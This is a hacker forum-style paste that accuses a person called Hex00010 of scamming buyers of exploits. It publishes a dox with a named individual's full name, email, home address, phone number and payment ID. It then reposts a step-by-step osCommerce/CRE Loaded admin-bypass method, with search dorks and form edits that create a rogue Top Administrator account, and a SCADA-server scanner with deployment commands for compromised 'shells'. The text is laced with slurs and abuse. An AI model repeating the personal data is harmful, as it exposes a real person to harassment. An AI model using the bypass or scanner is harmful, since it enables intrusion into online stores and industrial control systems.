Hex00010 Scammer! (Includes DoX + Exploits)

Hello there, world.

 

So, Hex00010 got kicked outta TeamP0isoN for buttfuckin' horny chicks in a Burger King's Bathroom, Just kidding, He got kicked out of TeamP0isoN for continously scamming people.

 

 

 

---------Hex000101's DoX (http://pastebin.com/zNmFmm59)-------

 

Name: William Premore

 

Email: william.premore@gmail.com

 

Address: 321 W Forest Pittsburg, KS 66762

 

Tel: +14177936577

 

-----------------------------------------------------------------------------------

 

He's selling exploits, do not BUY from him. He has scammed 20+ people.

 

He said he got 1337 0day exploits for Scada & OsCommerence, and he said he's selling them.

 

Such a pathetic liar, isn't he?

 

Do not BUY shit from him, My friend payed him $250 for the 0day exploits, and he didn't gave him shit, he said he had a shell on a credit-card processing server, he gave him, but it was dead, then my friend started messaging him about it, and he doesn't replies.

 

Here are his so-called '0day' exploits. Enjoy, folks.

 

-----------------------------------------------------------------------------

 

twitter.com/Reckz0r - @Reckz0r - My twitter feed! (Follow for the exposure of cunts)

----------------------------------------------------------------------------

 

Contact me for the Scada Files for exploiting Scada Websites.

 

His LR: U0164888

 

He's a scammer. Do not BUY shit from him.

 

#FuckScammers

#Pwnage

#OpBangarang

 

*************************************************************************************

 

#1 - OsCommerence (He stole this exploit, Original: http://wasimasif.wordpress.com/2010/05/23/oscommerce-security-exploit-allows-access-to-admin-without-password/)

 

"/*

*

*       TeaMp0ison Run's This Shit Nigga

*

* Found By:  Hex00010  ~  TeaMp0ison ~ Bitches

*

*

*/

Using Version CRE Loaded PCI B2B v6.4.1

Using Version CRE Loaded Professional v6.3

Copyright © 2008 osCommerce and The Template Shop

2006 CRE Loaded Project

Using Version CRE Loaded v6.2

Using Version CRE Loaded PCI Pro v6.4.1

Using Version CRE Loaded PCI Pro v6.4

The best dork -> intitle:"CRE Loaded 6"

Using Version CRE Loaded v6.2 B2B

inurl:"information.php?info_

id="

"intext:Powered by Oscommerce Supercharged by CRE Loaded"

 

---------------------------------

 

Exploit paths:

 

 

*admin_members.php/login.php

 

*administrators.php/login.php

 

*admin_users.php/login.php

 

----------------------------

 

Method:

 

for example: www.littleelves.com this our target.

 

 

we go to: www.littleelves.com/admin/

 

you will get http://www.littleelves.com/admin/login.php?osCAdminID=80b8cd584fff0a7bb10374446b35987a

 

Remove  "login.php?osCAdminID=80b8cd584fff0a7bb10374446b35987a" and put "admin_members.php/login.php" instead.

 

after that you will get a page has "TEXT_INFO_HEADING_DEFAULT"

 

Now add this to the URL: http://www.littleelves.com/admin/admin_members.php/login.php?action=new_member

 

not we just added "?action=new_member"

 

after that .. in the same web browser right click then "View source".

 

Copy the source of the current page. and search for word "post".

 

you will find the line will be like this:

 

<form name="newmember" action="http://solarenergyworksstore.com/admin/admin_members.php?action=member_new&page=mID=&osCAdminID=54ebf8c481a5963b75f9e0014503856f" method="post" enctype="multipart/form-data">

 

 

Change it to

 

<form name="newmember" action="http://solarenergyworksstore.com/admin/admin_members.php/login.php?action=member_new&page=mID=&osCAdminID=54ebf8c481a5963b75f9e0014503856f" method="post" enctype="multipart/form-data">

 

Then fill these options:

 

 TEXT_INFO_FIRSTNAME: admin

 TEXT_INFO_LASTNAME: Support

 TEXT_INFO_EMAIL: Put your Email here so you can receive the password.

 TEXT_INFO_GROUP: Top Administrator

 

then click on "Insert".

 

after you clicking Insert. go to your email inbox. you will find a new email "New Password". then you will be able to log in. :)

 

that's the exploit is all about."

 

#2 - Scada

 

 

"/**

 *  ClearScada Exploit   -  Finder - 2012 - DO NOT SHARE

 *  International SCADA Exploit Finder

 *  Status: Public

 *  

 *  Programmed by: Hex00010

 *  

 */

 

Hello everyone

 

Today i present you with the  SCADA Exploit that  can find  Servers   using the  ClearSCADA   product.

 

this is a demonstration proof of concept exploit - this exploit  is  more  informational - Unauthentication

it uses a  client/server.

 

this exploit is in response to the  SCADA EXPLOITS - Hex00010 - Water - Power Plant  located here

 

http://pastebin.com/SjHSWfkV

 

 

 

Server -> reads  5,000 ip's at a  time - once those  5k are up it loads a  new set  of  5k ( also can run multiple ip's if configured through the server correctly for Parallel Data Processing

 

opcode 0 - request a server

opcode 1 - the servers result (0 for invalid, 1 for valid)

 

Opens Port on : 8081

 

Each server  has its own pre-defined  ip list

 

 

 

Server Machine 1:  host  100mb of  ip's

Server Machine 2:  host  600mb of  ip's

 

 

 

Client Machine 1 -> connects to  host 1  - Scans  5k  - ends  - restarts  - if found valid -> print - else - continue - end

 

Client Machine 2 -> connects to  host 1  - Scans  5k  - ends  - restarts  - if found valid -> print - else - continue - end

 

Each machine scans its own subnet

 

 

Supports  Server Clustering  to maximize scanning times

 

 

Supports  SSL  Scanning

 

-----------------------------------------------------------------------------------------------------------

 

 

 

 

Client  ->

 

Reads IP Addresses from the server  and  displays if there valid or not in a file

Reads  Server  Header Information

 

 

 

 

 

 

 

Features:

                       

Server - Pools the clients, Accepts unlimited connections, Queues the server ip list.

Client - Asynchronous processing - Request an ip whilst the other threads are processing. Checks the header for clearscada.

== SETUP ==

In main directory, for the CLIENT

Edit src/ServerConnection.java

Change 127.0.0.1 to the SERVERS ip. Save.

Go back to the parent of src

Make folder bin

 

javac -d bin src/*.java

 

== Copy contents of 'bin' to the shells / servers you want to set up the thread on ==

java -Xmx512m ScadaMain [THREADS]

 

== For the SERVER ==

In the 'Server' directory make bin folder

javac -d bin src/*.java

 

== Copy contents of bin to the main server ==

[sudo ]java -Xmx2048m Server

 

 

 

--------------------------------------------------------------------------------------------------------------

 

 

Run IPGen  to generate  all of the ip addresses  - writes to  ip's.txt"

 

*********************************************************************************

 

Bitches gonna get exposed.

Don't scam.

Be original.

 

twitter.com/Reckz0r

Stay tuned for more bullshit.